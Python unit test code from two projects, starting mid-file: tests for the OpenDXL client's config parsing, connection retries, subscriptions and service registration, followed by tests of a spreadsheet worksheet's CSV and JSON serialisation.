                              dedent(read_data).encode())) as mock_open, \
                patch.object(os.path, 'isfile', return_value=True):
            client_config = DxlClientConfig.create_dxl_config_from_file("mock_file")
        # Cert options must round-trip verbatim
        self.assertEqual(client_config.cert_file, "certfile.pem")
        self.assertEqual(client_config.broker_ca_bundle, "certchain.pem")
        self.assertEqual(client_config.private_key, "privatekey.pk")
        # The broker line is parsed into id;port;host;ip fields
        broker = client_config.brokers[0]
        self.assertEqual(broker.host_name, "dxl-broker-1")
        self.assertEqual(broker.ip_address, "10.218.73.206")
        self.assertEqual(broker.port, 8883)
        self.assertEqual(broker.unique_id, "22cdcace-6e8f-11e5-29c0-005056aa56de")
        # The config file must be opened in binary read mode
        mock_open.assert_called_with("mock_file", "rb")

    def test_set_config_wrong_file_raises_exception(self):
        with self.assertRaises(Exception):
            DxlClientConfig.create_dxl_config_from_file("this_file_doesnt_exist.cfg")

    @parameterized.expand([
        (CONFIG_DATA_NO_CERTS_SECTION,),
        (CONFIG_DATA_NO_CA_OPTION,),
        (CONFIG_DATA_NO_CERT_OPTION,),
        (CONFIG_DATA_NO_PK_OPTION,),
    ])
    def test_missing_certs_raises_exception(self, read_data):
        # Any missing certificate section/option is a hard ValueError
        with patch.object(builtins, 'open',
                          return_value=io.BytesIO(
                              dedent(read_data).encode())), \
                patch.object(os.path, 'isfile', return_value=True):
            with self.assertRaises(ValueError):
                DxlClientConfig.create_dxl_config_from_file("mock_file.cfg")

    @parameterized.expand([
        (CONFIG_DATA_NO_BROKERS_SECTION,),
        (CONFIG_DATA_NO_BROKERS_OPTION,),
    ])
    def test_missing_brokers_doesnt_raise_exceptions(self, read_data):
        # Missing brokers is tolerated -- the config just has an empty list
        with patch.object(builtins, 'open',
                          return_value=io.BytesIO(
                              dedent(read_data).encode())), \
                patch.object(os.path, 'isfile', return_value=True):
            client_config = DxlClientConfig.create_dxl_config_from_file(
                "mock_file.cfg")
            self.assertEqual(len(client_config.brokers), 0)

    class CapturedBytesIO(io.BytesIO):
        # BytesIO stand-in that records the last write so the tests can
        # inspect what config.write() produced.
        def __init__(self):
            super(DxlClientConfigTest.CapturedBytesIO, self).__init__()
            self._bytes_captured = None

        @property
        def bytes_captured(self):
            # The payload of the most recent write() call
            return self._bytes_captured

        def write(self, bytes_to_write):
            self._bytes_captured = bytes_to_write

    def test_write_in_memory_config(self):
        expected_data = os.linesep.join([
            "[Certs]",
            "BrokerCertChain = mycabundle.pem",
            "CertFile = mycertfile.pem",
            "PrivateKey = myprivatekey.pem",
            "{}[Brokers]".format(os.linesep),
            "myid1 = myid1;8001;myhost1;10.10.100.1",
            "myid2 = myid2;8002;myhost2;10.10.100.2{}".format(os.linesep)])
        byte_stream = self.CapturedBytesIO()
        with patch.object(builtins, 'open',
                          return_value=byte_stream) as mock_open:
            config = DxlClientConfig(
                "mycabundle.pem",
                "mycertfile.pem",
                "myprivatekey.pem",
                [Broker("myhost1", "myid1", "10.10.100.1",
                        8001),
                 Broker("myhost2", "myid2", "10.10.100.2",
                        8002)])
            config.write("myfile.txt")
        self.assertEqual(expected_data.encode(), byte_stream.bytes_captured)
        mock_open.assert_called_with("myfile.txt", "wb")

    def test_write_modified_config(self):
        # Writing back a loaded config must preserve comments while
        # reflecting the in-memory edits made after loading.
        initial_data = os.linesep.join([
            "# mycerts",
            "[Certs]",
            "BrokerCertChain = abundle.crt",
            "CertFile = acertfile.crt",
            "# pk file",
            "PrivateKey = akey.key",
            "{}[Brokers]".format(os.linesep),
            "# broker 7",
            "myid7 = myid7;8007;myhost7;10.10.100.7",
            "# broker 8",
            "myid8 = myid8;8008;myhost8;10.10.100.8{}".format(os.linesep)])
        expected_data_after_mods = os.linesep.join([
            "# mycerts",
            "[Certs]",
            "BrokerCertChain = newbundle.pem",
            "CertFile = acertfile.crt",
            "# pk file",
            "PrivateKey = newkey.pem",
            "{}[Brokers]".format(os.linesep),
            "# broker 8",
            "myid8 = myid8;8008;myhost8;10.10.100.8",
            "myid9 = myid9;8009;myhost9;10.10.100.9{}".format(os.linesep)])
        with patch.object(builtins, 'open',
                          return_value=io.BytesIO(initial_data.encode())), \
                patch.object(os.path, 'isfile', return_value=True):
            config = DxlClientConfig.create_dxl_config_from_file(
                "mock_file.cfg")
        # Mutate the loaded config: drop broker 7, swap certs, add broker 9
        del config.brokers[0]
        config.broker_ca_bundle = "newbundle.pem"
        config.private_key = "newkey.pem"
        config.brokers.append(Broker("myhost9",
                                     "myid9",
                                     "10.10.100.9",
                                     8009))
        byte_stream = self.CapturedBytesIO()
        with patch.object(builtins, 'open',
                          return_value=byte_stream) as mock_open:
            config.write("newfile.txt")
        self.assertEqual(expected_data_after_mods.encode(),
                         byte_stream.bytes_captured)
        mock_open.assert_called_with("newfile.txt", "wb")
class DxlClientTest(unittest.TestCase):
def setUp(self):
self.config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
mqtt_client_patch = patch('paho.mqtt.client.Client')
mqtt_client_patch.start()
self.client = DxlClient(self.config)
self.client._request_manager.wait_for_response = Mock(return_value=Response(request=None))
self.test_channel = '/test/channel'
def tearDown(self):
self.client._connected = False
self.client.destroy()
patch.stopall()
def test_client_raises_exception_on_connect_when_already_connecting(self):
self.client._client.connect.side_effect = Exception("An exception!")
self.client._thread = threading.Thread(target=None)
self.assertEqual(self.client.connected, False)
with self.assertRaises(DxlException):
self.client.connect()
self.client._thread = None
def test_client_raises_exception_on_connect_when_already_connected(self):
self.client._client.connect.side_effect = Exception("An exception!")
self.client._connected = True
with self.assertRaises(DxlException):
self.client.connect()
# The following test is too slow
def test_client_disconnect_doesnt_raises_exception_on_disconnect_when_disconnected(self):
self.assertEqual(self.client.connected, False)
self.client.disconnect()
self.client.disconnect()
@parameterized.expand([
# (connect + retries) * 2 = connect_count
(0, 2),
(1, 4),
(2, 6),
])
def test_client_retries_defines_how_many_times_the_client_retries_connection(self, retries, connect_count):
# Client wont' connect ;)
self.client._client.connect = Mock(side_effect=Exception('Could not connect'))
# No delay between retries (faster unit tests)
self.client.config.reconnect_delay = 0
self.client._wait_for_policy_delay = 0
broker = Broker(host_name='localhost')
broker._parse(UuidGenerator.generate_id_as_string() + ";9999;localhost;127.0.0.1")
self.client.config.brokers = [broker]
self.client.config.connect_retries = retries
with self.assertRaises(DxlException):
self.client.connect()
self.assertEqual(self.client._client.connect.call_count, connect_count)
def test_client_subscribe_adds_subscription_when_not_connected(self):
self.client._client.subscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
self.assertEqual(self.client._client.subscribe.call_count, 0)
def test_client_unsubscribe_removes_subscription_when_not_connected(self):
self.client._client.unsubscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
# Add subscription
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
# Remove subscription
self.client.unsubscribe(self.test_channel)
self.assertFalse(self.test_channel in self.client.subscriptions)
def test_client_subscribe_doesnt_add_twice_same_channel(self):
# Mock client.subscribe and is_connected
self.client._client.subscribe = Mock(
return_value=(mqtt.MQTT_ERR_SUCCESS, 2))
self.client._connected = Mock(return_value=True)
self.client._wait_for_packet_ack = Mock(return_value=None)
# We always have the default (myself) channel
self.assertEqual(len(self.client.subscriptions), 1)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.assertEqual(self.client._client.subscribe.call_count, 1)
def test_client_handle_message_with_event_calls_event_callback(self):
event_callback = EventCallback()
event_callback.on_event = Mock()
self.client.add_event_callback(self.test_channel, event_callback)
# Create and process Event
evt = Event(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, evt)
# Check that callback was called
self.assertEqual(event_callback.on_event.call_count, 1)
self.client.remove_event_callback(self.test_channel, event_callback)
self.client._handle_message(self.test_channel, evt)
# Check that callback was not called again - because the event
# callback was unregistered
self.assertEqual(event_callback.on_event.call_count, 1)
def test_client_handle_message_with_request_calls_request_callback(self):
req_callback = RequestCallback()
req_callback.on_request = Mock()
self.client.add_request_callback(self.test_channel, req_callback)
# Create and process Request
req = Request(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, req)
# Check that callback was called
self.assertEqual(req_callback.on_request.call_count, 1)
self.client.remove_request_callback(self.test_channel, req_callback)
self.client._handle_message(self.test_channel, req)
# Check that callback was not called again - because the request
# callback was unregistered
self.assertEqual(req_callback.on_request.call_count, 1)
def test_client_handle_message_with_response_calls_response_callback(self):
callback = ResponseCallback()
callback.on_response = Mock()
self.client.add_response_callback(self.test_channel, callback)
# Create and process Response
msg = Response(request=None)._to_bytes()
self.client._handle_message(self.test_channel, msg)
# Check that callback was called
self.assertEqual(callback.on_response.call_count, 1)
self.client.remove_response_callback(self.test_channel, callback)
self.client._handle_message(self.test_channel, msg)
# Check that callback was not called again - because the response
# callback was unregistered
self.assertEqual(callback.on_response.call_count, 1)
def test_client_remove_call_for_unregistered_callback_does_not_error(self):
callback = EventCallback()
callback.on_event = Mock()
callback2 = EventCallback()
callback2.on_event = Mock()
self.client.add_event_callback(self.test_channel, callback)
self.client.add_event_callback(self.test_channel, callback2)
self.client.remove_event_callback(self.test_channel, callback)
self.client.remove_event_callback(self.test_channel, callback)
def test_client_send_event_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Event(destination_topic="")
self.client.send_event(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_request_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Request(destination_topic="")
self.client._send_request(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_response_publishes_message_to_dxl_fabric(self):
    """send_response must publish exactly one message via the underlying MQTT client."""
    publish_mock = Mock(return_value=None)
    self.client._client.publish = publish_mock
    self.client.send_response(Response(request=None))
    self.assertEqual(publish_mock.call_count, 1)
def test_client_handles_error_response_and_fire_response_handler(self):
    """An ErrorResponse arriving off the wire must reach _fire_response exactly once."""
    fire_mock = Mock(return_value=None)
    self.client._fire_response = fire_mock
    # Serialize an error response exactly as it would arrive from the broker.
    wire_bytes = ErrorResponse(
        request=None, error_code=666, error_message="test message")._to_bytes()
    self.client._handle_message(self.test_channel, wire_bytes)
    self.assertEqual(fire_mock.call_count, 1)
def test_client_subscribe_no_ack_raises_timeout(self):
    """subscribe must raise WaitTimeoutException when the SUBACK never arrives."""
    # The mocked MQTT subscribe reports success with message id 2, but no
    # acknowledgment for that id is ever delivered.
    self.client._client.subscribe = Mock(return_value=(mqtt.MQTT_ERR_SUCCESS, 2))
    self.client._connected = Mock(return_value=True)
    # Shrink the ack wait so the test times out quickly instead of blocking.
    with patch.object(DxlClient, '_MAX_PACKET_ACK_WAIT', 0.01), \
            self.assertRaises(WaitTimeoutException):
        self.client.subscribe(self.test_channel)
def test_client_unsubscribe_no_ack_raises_timeout(self):
    """unsubscribe must raise WaitTimeoutException when the UNSUBACK never arrives."""
    self.client._client.subscribe = Mock(
        return_value=(mqtt.MQTT_ERR_SUCCESS, 2))
    self.client._client.unsubscribe = Mock(
        return_value=(mqtt.MQTT_ERR_SUCCESS, 3))
    self.client._connected = Mock(return_value=True)
    # Temporarily bypass the ack wait so the initial subscribe succeeds
    # without needing a real SUBACK.
    original_wait_packet_acked_func = self.client._wait_for_packet_ack
    self.client._wait_for_packet_ack = Mock(return_value=None)
    self.client.subscribe(self.test_channel)
    # Restore the real wait so unsubscribe actually blocks on the missing ack.
    self.client._wait_for_packet_ack = original_wait_packet_acked_func
    with patch.object(DxlClient, '_MAX_PACKET_ACK_WAIT', 0.01):
        with self.assertRaises(WaitTimeoutException):
            self.client.unsubscribe(self.test_channel)
# Service unit tests
def test_client_register_service_subscribes_client_to_channel(self):
    """Registering a service must subscribe the client to every service topic."""
    channel = '/mcafee/service/unittest'
    # Create dummy service
    service_info = dxlclient.service.ServiceRegistrationInfo(
        service_type='/mcafee/service/unittest', client=self.client)
    # Add topics to the service: two individually, three more in bulk.
    service_info.add_topic(channel + "1", RequestCallback())
    service_info.add_topic(channel + "2", RequestCallback())
    service_info.add_topics({channel + str(i): RequestCallback()
                             for i in range(3, 6)})
    subscriptions_before_registration = self.client.subscriptions
    # Expected result: the prior subscriptions plus the five service topics.
    expected_subscriptions_after_registration = \
        sorted(subscriptions_before_registration +
               tuple(channel + str(i) for i in range(1, 6)))
    # Register service in client
    self.client.register_service_async(service_info)
    # Check subscribed channels
    subscriptions_after_registration = self.client.subscriptions
    self.assertEqual(expected_subscriptions_after_registration,
                     sorted(subscriptions_after_registration))
def test_client_wont_register_the_same_service_twice(self):
    """Re-registering the same ServiceRegistrationInfo must raise DxlException."""
    info = dxlclient.service.ServiceRegistrationInfo(
        service_type='/mcafee/service/unittest', client=self.client)
    info_registered_once = info
    self.client.register_service_async(info_registered_once)
    # A second registration of the identical object must be rejected.
    with self.assertRaises(dxlclient.DxlException):
        self.client.register_service_async(info_registered_once)
def test_client_register_service_sends_register_request_to_broker(self):
    """Async service registration must eventually send a request to the broker."""
    info = dxlclient.service.ServiceRegistrationInfo(
        service_type='/mcafee/service/unittest', client=self.client)
    send_request_mock = Mock(return_value=True)
    self.client._send_request = send_request_mock
    self.client._connected = Mock(return_value=True)
    self.client.register_service_async(info)
    # Registration runs on a background thread; allow it time to fire.
    time.sleep(2)
    self.assertTrue(send_request_mock.called)
def test_client_register_service_unsubscribes_client_to_channel(self):
    """Unregistering a service must drop the subscriptions its registration added."""
    channel1 = '/mcafee/service/unittest/one'
    channel2 = '/mcafee/service/unittest/two'
    # Create dummy service
    service_info = dxlclient.service.ServiceRegistrationInfo(
        service_type='/mcafee/service/unittest', client=self.client)
    service_info.add_topic(channel1, RequestCallback())
    service_info.add_topic(channel2, RequestCallback())
    # Register service in client
    self.client.register_service_async(service_info)
    # Check subscribed channels
    subscriptions = self.client.subscriptions
    self.assertIn(channel1, subscriptions, "Client wasn't subscribed to service channel")
    self.assertIn(channel2, subscriptions, "Client wasn't subscribed to service channel")
    self.client.unregister_service_async(service_info)
    subscriptions = self.client.subscriptions
    self.assertNotIn(channel1, subscriptions, "Client wasn't unsubscribed to service channel")
    self.assertNotIn(channel2, subscriptions, "Client wasn't unsubscribed to service channel")
def test_client_register_service_unsuscribes_from_channel_by_guid(self):
    """Unregistering via a *different* object carrying the same service GUID
    must remove the registered service's topic subscriptions.

    Bug fix: the original test rebound ``service_info`` via
    ``service_info2 = service_info = ServiceRegistrationInfo(...)``, so the
    object that was registered was never distinct from the one unregistered,
    and ``service_info._service_id = service_info.service_id`` was a
    self-assignment no-op. Build the second object separately and copy the
    GUID across so the lookup-by-GUID path is actually exercised.
    """
    channel1 = '/mcafee/service/unittest/one'
    channel2 = '/mcafee/service/unittest/two'
    # Create dummy service with two request topics.
    service_info = dxlclient.service.ServiceRegistrationInfo(
        service_type='/mcafee/service/unittest', client=self.client)
    service_info.add_topic(channel1, RequestCallback())
    service_info.add_topic(channel2, RequestCallback())
    # Create same dummy service - different object, same service GUID.
    service_info2 = dxlclient.service.ServiceRegistrationInfo(
        service_type='/mcafee/service/unittest', client=self.client)
    service_info2._service_id = service_info.service_id
    service_info2.add_topic(channel1, RequestCallback())
    service_info2.add_topic(channel2, RequestCallback())
    # Register service in client
    self.client.register_service_async(service_info)
    # Check subscribed channels
    subscriptions = self.client.subscriptions
    self.assertIn(channel1, subscriptions, "Client wasn't subscribed to service channel")
    self.assertIn(channel2, subscriptions, "Client wasn't subscribed to service channel")
    # Unregister using the *other* object; the client matches by GUID.
    self.client.unregister_service_async(service_info2)
    subscriptions = self.client.subscriptions
    self.assertNotIn(channel1, subscriptions, "Client wasn't unsubscribed to service channel")
    self.assertNotIn(channel2, subscriptions, "Client wasn't unsubscribed to service channel")
@attr('system')
class DxlClientSystemClientTest(BaseClientTest):
    """System tests that exercise a real DXL client against a live broker."""

    def test_client_connects_to_broker_and_sets_current_broker(self):
        # After connect, current_broker must be one of the configured brokers.
        with self.create_client() as client:
            broker_ids = [broker.unique_id for broker in client.config.brokers]
            client.connect()
            self.assertTrue(client.connected)
            self.assertIn(client.current_broker.unique_id, broker_ids)

    def test_client_raises_exception_when_cannot_sync_connect_to_broker(self):
        # Point the client at an unroutable address; connect must fail fast
        # because retries are disabled.
        with self.create_client(max_retries=0) as client:
            broker = Broker("localhost", UuidGenerator.generate_id_as_string(),
                            "127.0.0.255", 58883)
            client._config.brokers = [broker]
            with self.assertRaises(DxlException):
                client.connect()

    def test_client_receives_event_on_topic_only_after_subscribe(self):
        """
        The idea of this test is to send an event to a topic which we are not
        subscribed, so we shouldn't be notified. Then, we subscribe to that
        topic and send a new event, we should get that last one.
        """
        with self.create_client() as client:
            test_topic = '/test/whatever/' + client.config._client_id
            client.connect()
            self.assertTrue(client.connected)
            # Set request callback (use mock to easily check when it was called)
            ecallback = EventCallback()
            ecallback.on_event = Mock()
            client.add_event_callback(test_topic, ecallback, False)
            # Send event thru dxl fabric to a topic which we are *not* subscribed
            msg = Event(destination_topic=test_topic)
            client.send_event(msg)
            time.sleep(1)
            # We haven't been notified
            self.assertEqual(ecallback.on_event.call_count, 0)
            # Subscribe to topic
            client.subscribe(test_topic)
            # Send event thru dxl fabric again to that topic
            msg = Event(destination_topic=test_topic)
            client.send_event(msg)
            time.sleep(1)
            # Now we should have been notified of the event
            self.assertEqual(ecallback.on_event.call_count, 1)

    def test_client_receives_error_response_on_request_to_unknown_service(self):
        """
        The idea of this test is to send a sync request to an unknown service
        and get a "unable to locate service" error response.
        """
        with self.create_client() as client:
            test_topic = '/test/doesntexists/' + client.config._client_id
            client.connect()
            self.assertTrue(client.connected)
            # Send request thru dxl fabric to a service which doesn't exists
            msg = Request(destination_topic=test_topic)
            msg.service_id = UuidGenerator.generate_id_as_string()
            response = client.sync_request(msg, 1)
            # Check that we have an error response for our request
            self.assertTrue(isinstance(response, ErrorResponse))
            self.assertEqual(response.service_id, msg.service_id)
if __name__ == '__main__':
    # Run this module's tests when executed directly.
    unittest.main()
|
test_worksheet.py | # Copyright (c) 2010 Resolver Systems Ltd, PythonAnywhere LLP
# See LICENSE.md
#
from __future__ import with_statement
try:
import unittest2 as unittest
except ImportError:
import unittest
import codecs
import json
import simplejson as json
from StringIO import StringIO
from mock import Mock, patch
from threading import Thread
from dirigible.test_utils import ResolverTestCase
from sheet.cell import Cell, undefined
from sheet.worksheet import (
Bounds, InvalidKeyError, Worksheet, worksheet_to_csv,
worksheet_to_json, worksheet_from_json,
)
class WorksheetToCsvTest(ResolverTestCase):
    """Tests for worksheet_to_csv: stream handling, encodings and ordering."""

    @patch('sheet.worksheet.csv')
    @patch('sheet.worksheet.StringIO')
    def test_should_use_stringio_and_return_result(self, mock_stringio_class, mock_csv):
        mock_stringio_object = mock_stringio_class.return_value
        # getvalue() must be read before close(), or the result would be lost.
        def check_getvalue_has_been_called():
            self.assertCalledOnce(mock_stringio_object.getvalue)
        mock_stringio_object.close.side_effect = check_getvalue_has_been_called
        ws = Worksheet()
        ws.A1.value = "test data"
        result = worksheet_to_csv(ws, encoding='ascii')
        self.assertCalledOnce(mock_csv.writer, mock_stringio_object)
        self.assertEquals(result, mock_stringio_object.getvalue.return_value)
        self.assertCalledOnce(mock_stringio_object.close)

    @patch('sheet.worksheet.csv')
    def test_should_handle_empty_worksheet(self, mock_csv):
        ws = Worksheet()
        result = worksheet_to_csv(ws, encoding='ascii')
        mock_writer = mock_csv.writer.return_value
        # An empty sheet must emit no rows at all.
        self.assertFalse(mock_writer.writerow.called)

    def test_should_convert_unicode_to_windows_1252(self):
        ws = Worksheet()
        ws.a1.value = u'Sacr\xe9 bleu!'
        ws.a2.value = u'\xa312.95'
        ws.a3.value = u'\u20ac9.99'
        result = worksheet_to_csv(ws, encoding='windows-1252')
        # Drop the trailing empty chunk after the final CRLF before comparing.
        self.assertEquals(
            result.split('\r\n')[:-1],
            [
                ws.a1.value.encode('windows-1252'),
                ws.a2.value.encode('windows-1252'),
                ws.a3.value.encode('windows-1252'),
            ]
        )

    def test_raises_on_attempting_to_encode_nonwestern_chars_to_excel_format(self):
        # Kanji has no representation in windows-1252, so encoding must fail.
        some_kanji = u'\u30bc\u30ed\u30a6\u30a3\u30f3\u30b0'
        ws = Worksheet()
        ws.a1.value = some_kanji
        self.assertRaises(
            UnicodeEncodeError,
            lambda : worksheet_to_csv(ws, encoding='windows-1252')
        )

    def test_handles_cell_values_set_to_non_ascii_bytes(self):
        a_large_number = 25700000000.0
        ws = Worksheet()
        ws.a1.value = a_large_number
        result = worksheet_to_csv(ws, encoding='windows-1252')
        # Round-trip the output through a windows-1252 decoder; it must decode
        # cleanly without raising.
        stream = StringIO()
        stream.write(result)
        stream.seek(0)
        decoder = codecs.getreader('windows-1252')(stream)
        decoder.read()

    def test_can_convert_unicode_to_utf8(self):
        some_kanji = u'\u30bc\u30ed\u30a6\u30a3\u30f3\u30b0'
        ws = Worksheet()
        ws.a1.value = some_kanji
        result = worksheet_to_csv(ws, encoding='utf-8')
        self.assertEquals(
            result.split('\r\n')[:-1],
            [
                ws.a1.value.encode('utf-8'),
            ]
        )

    @patch('sheet.worksheet.csv')
    def test_should_process_contents_in_raster_order(self, mock_csv):
        ws = Worksheet()
        ws.A1.value = 1
        ws.B1.value = 2
        ws.C1.value = 3
        ws.A2.value = 4
        ws.B2.value = 5
        ws.C2.value = 6
        result = worksheet_to_csv(ws, encoding='windows-1252')
        mock_writer = mock_csv.writer.return_value
        # Rows are emitted top-to-bottom, cells left-to-right.
        self.assertEquals(
            mock_writer.writerow.call_args_list,
            [
                (([1, 2, 3],), {}),
                (([4, 5, 6],), {})
            ]
        )

    @patch('sheet.worksheet.csv')
    def test_should_include_everything_from_A1_outwards(self, mock_csv):
        ws = Worksheet()
        ws.B3.value = 5
        result = worksheet_to_csv(ws, encoding='windows-1252')
        mock_writer = mock_csv.writer.return_value
        # Empty rows/columns between A1 and the occupied cell are padded with "".
        self.assertEquals(
            mock_writer.writerow.call_args_list,
            [
                ((["", ""],), {}),
                ((["", ""],), {}),
                ((["", 5],), {})
            ]
        )
class WorksheetJSONificationTest(ResolverTestCase):
    """Round-trip tests for worksheet_to_json / worksheet_from_json."""

    def test_empty_worksheet_to_json(self):
        worksheet = Worksheet()
        worksheet_json = worksheet_to_json(worksheet)
        # Even an empty sheet serialises its console text and usercode error.
        self.assertEquals(
            json.loads(worksheet_json),
            {
                "_console_text": "",
                "_usercode_error": None,
            }
        )

    @patch('sheet.worksheet.StringIO')
    def test_worksheet_to_json_remembers_to_close_stringIO_stream(self, mock_stringio):
        worksheet = Worksheet()
        mock_stringio.return_value = Mock()
        worksheet_to_json(worksheet)
        self.assertCalledOnce(mock_stringio.return_value.close)

    def test_worksheet_with_data_to_json(self):
        self.maxDiff = None
        worksheet = Worksheet()
        worksheet.B29.formula = "a constant"
        worksheet.B29.value = 56
        worksheet.B29.formatted_value = "fifty-six"
        worksheet.B29.error = "b0rken"
        worksheet.C29.formula = "another constant"
        worksheet.C29.value = ["value", "is", "a", "list"]
        worksheet.C29.formatted_value = "[the same list]"
        # A value json cannot serialise should be omitted from the output;
        # only its formatted_value survives (checked for D29 below).
        class UnJSONableObject(object):
            def __str__(self):
                return "The result of str-ing the object"
        worksheet.D29.formula = None
        worksheet.D29.value = UnJSONableObject()
        worksheet.D29.formatted_value = "The formatted object"
        worksheet.E29.formula = '=1 + 2'
        worksheet.E29.value = 3
        worksheet.E29.formatted_value = "Three"
        worksheet._console_text = "The console text"
        worksheet._usercode_error = { "message": "The usercode error", "line": 23 }
        worksheet_json = worksheet_to_json(worksheet)
        # Cells are keyed "col,row"; "=" formulas also emit a python_formula.
        self.assertEquals(
            json.loads(worksheet_json),
            {
                u"2,29" : {
                    u"formula" : u"a constant",
                    u"value" : 56,
                    u"formatted_value": u"fifty-six",
                    u"error": u"b0rken"
                },
                u"3,29" : {
                    u"formula" : u"another constant",
                    u"value" : [u"value", u"is", u"a", u"list"],
                    u"formatted_value": u"[the same list]"
                },
                u"4,29" : {
                    u"formula" : None,
                    u"formatted_value": u"The formatted object",
                },
                u"5,29" : {
                    u"formula" : u"=1 + 2",
                    u"python_formula" : u"1 + 2",
                    u"value": 3,
                    u"formatted_value": u"Three",
                },
                u"_console_text": u"The console text",
                u"_usercode_error": { u"message": u"The usercode error", u"line": 23 },
            }
        )

    def test_dependencies_get_put_in_json_as_array_of_arrays(self):
        self.maxDiff = None
        worksheet = Worksheet()
        worksheet.A1.dependencies = [(1, 2)]
        worksheet._console_text = ""
        worksheet_json = worksheet_to_json(worksheet)
        # JSON has no tuples, so dependency pairs become two-element arrays.
        self.assertEquals(
            json.loads(worksheet_json),
            {
                u"1,1" : {
                    u"formula" : None,
                    u"formatted_value" : u"",
                    u"dependencies" : [[1, 2]],
                },
                u"_console_text": u"",
                u"_usercode_error": None,
            }
        )

    def test_nan_values_are_ignored(self):
        self.maxDiff = None
        worksheet = Worksheet()
        worksheet.A1.value = float('nan')
        worksheet.A2.value = float('inf')
        worksheet.A3.value = float('-inf')
        worksheet_json = worksheet_to_json(worksheet)
        roundtripped = json.loads(worksheet_json)
        # Non-finite floats keep their formatted form but drop the raw value,
        # since NaN/Infinity are not valid JSON numbers.
        self.assertEquals(roundtripped["1,1"]['formatted_value'], 'nan')
        self.assertEquals(roundtripped["1,2"]['formatted_value'], 'inf')
        self.assertEquals(roundtripped["1,3"]['formatted_value'], '-inf')
        self.assertFalse('value' in roundtripped["1,1"])
        self.assertFalse('value' in roundtripped["1,2"])
        self.assertFalse('value' in roundtripped["1,3"])

    def test_empty_worksheet_from_json(self):
        worksheet = worksheet_from_json(
            json.dumps(
                {
                    "_console_text": "",
                    "_usercode_error": None,
                }
            )
        )
        self.assertEquals(worksheet._console_text, "")
        self.assertEquals(worksheet._usercode_error, None)
        # Deserialisation must recreate the (unserialisable) console lock.
        self.assertIsNotNone(worksheet._console_lock)

    def test_worksheet_with_data_from_json(self):
        worksheet = worksheet_from_json(
            json.dumps(
                {
                    "2,29" : {
                        "formula" : "a formula",
                        "value" : 56,
                        "dependencies" : [[4, 3], [2, 1]],
                        "formatted_value": "fifty-six",
                        "error": "b0rken"
                    },
                    "3,29" : {
                        "formula" : "another formula",
                        "value" : ["value", "is", "a", "list"],
                        "formatted_value": "[the same list]"
                    },
                    "4,29" : {
                        "formula" : None,
                        "formatted_value": "The formatted object",
                    },
                    "5,29" : {
                        "formula" : "=2 + 4",
                        "python_formula" : "2 + 4",
                        "value" : 6,
                        "formatted_value": "six",
                    },
                    "6,29" : {
                        "formula" : "=I don't have a python formula. I don't want one.",
                        "value" : 7,
                        "formatted_value": "seven",
                    },
                    "_console_text": "The console text",
                    "_usercode_error": { "message": "The usercode error", "line": 23 },
                }
            )
        )
        self.assertEquals(worksheet.B29.formula, "a formula")
        self.assertEquals(worksheet.B29.python_formula, None)
        # Dependency arrays come back as tuples.
        self.assertEquals(worksheet.B29.dependencies, [(4, 3), (2, 1)])
        self.assertEquals(worksheet.B29.value, 56)
        self.assertEquals(worksheet.B29.formatted_value, "fifty-six")
        self.assertEquals(worksheet.B29.error, "b0rken")
        self.assertEquals(worksheet.C29.formula, "another formula")
        self.assertEquals(worksheet.C29.python_formula, None)
        self.assertEquals(worksheet.C29.value, ["value", "is", "a", "list"])
        self.assertEquals(worksheet.C29.formatted_value, "[the same list]")
        self.assertEquals(worksheet.D29.formula, None)
        self.assertEquals(worksheet.D29.python_formula, None)
        # A missing value deserialises to the `undefined` sentinel.
        self.assertEquals(worksheet.D29.value, undefined)
        self.assertEquals(worksheet.D29.formatted_value, "The formatted object")
        self.assertEquals(worksheet.E29.formula, "=2 + 4")
        self.assertEquals(worksheet.E29.python_formula, "2 + 4")
        self.assertEquals(worksheet.E29.value, 6)
        self.assertEquals(worksheet.E29.formatted_value, "six")
        self.assertEquals(worksheet.F29.formula, "=I don't have a python formula. I don't want one.")
        self.assertEquals(worksheet.F29.python_formula, None)
        self.assertEquals(worksheet.F29.value, 7)
        self.assertEquals(worksheet.F29.formatted_value, "seven")
        self.assertEquals(worksheet._console_text, "The console text")
        self.assertEquals(worksheet._usercode_error, { "message": "The usercode error", "line": 23 })
        self.assertIsNotNone(worksheet._console_lock)

    @patch('sheet.worksheet.json')
    def test_worksheet_from_json_uses_json(self, mock_json):
        mock_json.loads.return_value = {}
        worksheet_from_json('{}')
        self.assertCalledOnce(mock_json.loads, '{}')
class WorksheetTest(unittest.TestCase):
    """Core Worksheet behaviour: construction, cell access by location or
    A1-style name, formula management, console text accumulation and bounds."""

    def test_initialise(self):
        ws = Worksheet()
        self.assertEquals(dict(ws), {})
        self.assertEquals(ws._console_text, '')
        self.assertEquals(ws._usercode_error, None)
        self.assertEquals(ws.name, None)

    def test_repr(self):
        ws = Worksheet()
        self.assertEquals(repr(ws), '<Worksheet>')
        ws.name = 'test worksheet'
        self.assertEquals(repr(ws), '<Worksheet test worksheet>')

    def test_equality(self):
        # Sheets compare by cell contents and by name; comparison against a
        # non-worksheet is simply unequal, not an error.
        ws1 = Worksheet()
        ws2 = Worksheet()
        ws2.A1.formula = 'a difference'
        self.assertFalse(ws1==ws2)
        self.assertTrue(ws1!=ws2)
        ws3 = Worksheet()
        self.assertTrue(ws1==ws3)
        self.assertFalse(ws1!=ws3)
        ws3.name = 'a different name!'
        self.assertFalse(ws1==ws3)
        self.assertTrue(ws1!=ws3)
        nonWs = 1.2
        self.assertFalse(ws1==nonWs)
        self.assertTrue(ws1!=nonWs)

